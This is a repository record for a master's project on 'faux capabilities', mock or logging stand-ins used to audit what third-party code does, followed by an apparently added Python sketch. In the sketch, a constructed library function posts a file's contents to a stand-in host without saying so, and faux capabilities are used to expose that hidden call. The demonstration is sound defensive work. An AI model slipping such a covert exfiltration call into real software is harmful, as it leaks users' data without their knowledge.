Publication Date
Spring 2025
Degree Type
Master's Project
Degree Name
Master of Science in Computer Science (MSCS)
Department
Computer Science
First Advisor
Thomas H. Austin
Second Advisor
Katerina Potika
Third Advisor
Fabio Di Troia
Keywords
Programming language design, cybersecurity, user experience, testing, sandboxing
Abstract
When using third-party packages or libraries, it is crucial to understand their behavior. Typically, this requires developers to conduct code reviews, set up sandbox environments for testing, or write unit tests with mocked values for every function used in their code. However, these approaches are often inefficient and time-consuming. A more effective solution would provide developers with a broad understanding of the functionality required by the code they plan to import. This can be done using object capabilities, where a particular functionality is the capability that an object must possess in order to perform the required actions. Examples of such capabilities include file I/O and network access. This research explores using the object-capabilities system to create faux capabilities. The faux capabilities possess the same methods and attributes as the original capabilities, but they behave differently. These capabilities can either mock results for the operations used by the third-party code or log those operations to a defined log file, helping developers gain insight into the code's behavior without having to set up a sandbox environment or create mocked unit tests.
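A minimal Python sketch of the idea in the abstract, added here as an illustration and not taken from the project itself: third-party code receives capability objects as arguments, and a faux stand-in with the same method names records each operation and returns a mocked result. The names `FileIO`, `Network`, `Faux`, `third_party_format` and `audit` are hypothetical, Python is an assumption (the abstract names no implementation language), and an in-memory list stands in for the log file.

```python
import urllib.request

class FileIO:
    """Real capability (illustrative): the only way a callee can touch files."""
    def read(self, path):
        with open(path) as f:
            return f.read()
    def write(self, path, data):
        with open(path, "w") as f:
            return f.write(data)

class Network:
    """Real capability (illustrative): outbound HTTP POST."""
    def post(self, url, body):
        req = urllib.request.Request(url, data=body.encode(), method="POST")
        return urllib.request.urlopen(req).status

class Faux:
    """Stand-in exposing the same method names as real_cls; logs and mocks calls."""
    def __init__(self, real_cls, log, mocks=None):
        self._real_cls, self._log, self._mocks = real_cls, log, mocks or {}

    def __getattr__(self, name):
        # Only methods that exist on the real capability are reachable.
        if name.startswith("_") or not callable(getattr(self._real_cls, name, None)):
            raise AttributeError(name)
        def call(*args, **kwargs):
            self._log.append((self._real_cls.__name__, name, args))
            return self._mocks.get(name)  # mocked result, or None when log-only
        return call

def third_party_format(fs, net, path):
    """Constructed 'library' function that is documented as only reformatting a file."""
    text = fs.read(path)
    fs.write(path, text.upper())
    net.post("https://collector.example/ingest", text)  # side effect the docs omit
    return len(text)

def audit(path="notes.txt"):
    """Run the library against faux capabilities; nothing touches disk or network."""
    log = []
    fs = Faux(FileIO, log, mocks={"read": "secret draft", "write": 12})
    net = Faux(Network, log, mocks={"post": 200})
    return third_party_format(fs, net, path), log

if __name__ == "__main__":
    result, log = audit()
    for entry in log:
        print(entry)
```

The recorded log shows the network call alongside the expected file operations, which is the kind of insight the abstract describes obtaining without a sandbox.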
Recommended Citation
Godse, Tanay, "Faux Capabilities: A novel approach for code analysis" (2025). Master's Projects. 1504.
DOI: https://doi.org/10.31979/etd.pfuq-dxb4
https://scholarworks.sjsu.edu/etd_projects/1504